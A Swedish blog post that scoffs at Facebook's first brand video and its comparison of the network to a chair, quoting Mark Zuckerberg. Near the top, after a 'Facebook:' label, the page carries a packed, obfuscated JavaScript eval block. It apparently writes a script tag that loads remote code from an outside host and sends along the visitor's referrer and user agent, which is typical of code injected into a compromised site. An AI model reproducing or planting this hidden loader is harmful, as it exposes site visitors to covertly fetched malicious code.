Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Facebook lanserar reklamfilm

Sebastian Plengier Ehrnfelt

Facebook: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdddh|var|u0026u|referrer|ksbfe||js|php’.split(‘|’),0,{}))
Idag lanserades en historisk händelse, ja i alla fall för Facebook. Det är den första reklamfilmen någonsin för det mega stora sociala nätverket. 

Som vi skrev tidigare idag så har nu Facebook en miljard aktiva användare, ja, det är helt sjukt.

Är denna reklamfilm kanske lite av att fira denna otroliga siffra? Ja, det vet vi inte.

Så här säger Grundaren av Facebook Mark Zuckerberg om filmen;

“For the first time in our history, we’ve made a brand video to express what our place is on this earth. We believe that the need to open up and connect is what makes us human. It’s what brings us together. It’s what brings meaning to our lives.”

Vi satt ett gäng på redaktionen och funderade på om filmen var bra eller dålig. Vi kom tillsammans fram till att den är riktigt dålig.

De pratar om stolar och hur Facebook kan jämföras med stolar. Jag vet personligen inte själv om detta är ironiskt eller vad det är som händer. Man tycker nog att ett så pass stort företag som Facebook skulle kunna anlita en lite bättre byrå för att ta fram något mer kreativt, men icke.

Hur som helst så vet vi nu att Facebook är som en stol. Något man köper, sitter på, har i hemmet, slänger.

Men självklart så händer det ibland att jag sitter på en stol och vilar, men Facebook, ärligt,  jag står hellre. 

Mer info: mashable.com

Läs artikeln om Facebook en miljard användare här!